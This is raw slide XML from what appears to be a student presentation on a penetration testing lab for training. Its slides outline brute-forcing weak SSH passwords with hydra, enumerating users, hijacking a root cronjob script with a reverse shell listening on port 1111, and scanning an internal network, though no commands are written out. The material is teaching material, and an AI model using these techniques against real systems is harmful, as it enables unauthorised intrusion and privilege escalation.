              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02916208-5EBD-79E8-43FE-31D4A400C746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717882" y="3152056"/>
            <a:ext cx="4241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Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4500" u="sng" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="733153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03E2-8717-66E1-A222-1E4DBA19464A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="209237"/>
            <a:ext cx="9905998" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to enumerate username </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8143216-9208-74D7-E77B-AD91A23E2584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487446" y="1690689"/>
            <a:ext cx="4274125" cy="2042382"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771E9907-7EBA-4131-A9E9-7B4B1C03FCA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188118" y="1528971"/>
            <a:ext cx="3691053" cy="2468576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{222DEC97-4047-9754-236B-87BC49101ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487446" y="4262023"/>
            <a:ext cx="6105525" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9470B9-313B-4991-AF72-9717F939BC41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6794320" y="4442964"/>
            <a:ext cx="4848902" cy="1428949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1408549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CDA1-95F5-C418-7A36-92A5A2F8FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974179" y="714375"/>
            <a:ext cx="3332955" cy="5076826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400"/>
              <a:t>Vulnerability</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C73397A8-E692-8EF6-7CD9-134EBF20E786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973046" y="714375"/>
            <a:ext cx="6253751" cy="5076825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weak SSH Credentials:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> This vulnerability occurs when users choose weak or easily guessable passwords for their SSH accounts. Attackers can exploit this by using automated tools to try many passwords (brute-force attack) until they find the correct one. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325313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242" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974179" y="714375"/>
            <a:ext cx="3332955" cy="5076826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Project Specification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10252" name="Rectangle 10251">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3" name="Rectangle 1025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251" name="Straight Connector 1025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sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973046" y="714375"/>
            <a:ext cx="6253751" cy="5076825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Story board</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We are building a Penetration Testing Labaratory. We are building it for people who are either learning or going through training. It is to be sent to our supervisor so that he can show it to the higher ups so they can share it for others to use such as schools to teach students, or teach those who are getting training from their company.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" i="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We aim to raise awareness of cybersecurity by educating users via practical implementation. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097990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9FCB-5B72-B1AC-E3D7-C2E3B0EA5643}"/>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Use hydra bruteforce password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5ECFD8F-FBC0-4CE8-47AC-B7D99A2BC586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="636915" y="1252410"/>
            <a:ext cx="6915663" cy="435686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54129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544E-9EC7-14CC-91B0-CDB2FE25EC23}"/>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Login using SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22FD020-E12D-0D96-25F4-454C7EAEEEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158433" y="640080"/>
            <a:ext cx="98705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474281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7203-1274-239F-2BB6-EB29FC067B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="3475634"/>
            <a:ext cx="10248900" cy="1000036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB86CB4-C0E6-CB98-B712-CC46EB9FC533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="1877622"/>
            <a:ext cx="110363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Google Sans"/>
              </a:rPr>
              <a:t>The attacker discovered a cronjob (a scheduled task) running a script named cron-update.sh with root privileges. This script was modifiable by users in the 'test' group, which allowed for privilege escalation.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD8308F-6A51-9134-9A02-40B2E5AEA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4721136"/>
            <a:ext cx="11036300" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Google Sans"/>
              </a:rPr>
              <a:t>Reverse Shell: The attacker added a reverse shell command to the cron-update.sh script. When the cronjob executed this script, it established a connection back to the attacker's machine, granting them root access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365F933C-5B39-FBE7-FEF3-128CC56804CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4785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Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="752404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FB06-B854-E74C-AE0E-1957522D3200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> job running as root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E09D523-9FBF-DBA2-0DF2-70CB56FE9BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570803" y="1816820"/>
            <a:ext cx="5125165" cy="1886213"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DEB3CE9-68C0-AAD7-0AAB-1E38232B3EF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182028" y="4125952"/>
            <a:ext cx="7188506" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rayan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is in the ‘test’ group and cron-update.sh file is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>runnin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319995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06E6-DD89-1143-D048-CAFDCFDD6109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>revershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command for privilege escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5F35084-A69E-6F3B-18ED-9BDD9ADF9345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859359" y="2190312"/>
            <a:ext cx="5841361" cy="2070530"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3FD8E51-0757-CAEA-5A3E-D867EB0BC8DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944118" y="4222742"/>
            <a:ext cx="6094476" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Listen to port 1111 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D0067F4-998C-10BB-3638-ECFE91C11339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583470" y="4762083"/>
            <a:ext cx="3572374" cy="1876687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1118399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73E5-4BE5-C95C-ED2C-7778CB886983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="609599"/>
            <a:ext cx="5435760" cy="2009775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally successfully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>loggined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD05EF7-1331-7D9A-17D4-ED1FBF67A715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="707739" y="987126"/>
            <a:ext cx="4765597" cy="167987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9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CD1E8E7-AFF9-3C76-564C-D551D38298C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="707739" y="2947481"/>
            <a:ext cx="4765597" cy="1691787"/>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0" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5D6A8A-B277-9AF9-9AA1-1DA09F8B5FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2774425"/>
            <a:ext cx="5435760" cy="3288445"/>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Mr.Sreeraj is in sudo group and succesfully  loggined as root.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4194504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506B0-7060-47EC-0078-6F2F709525AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="bg1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>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1BC6EAD-CF30-83F6-A3F0-8D4E051B1359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757889" y="1176529"/>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Windows Attack</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3998581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2A7D6-9459-91DB-1EA5-53D63DEFBAE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="609600"/>
            <a:ext cx="3643674" cy="1905000"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
              <a:t>Scanning the Internal Network</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
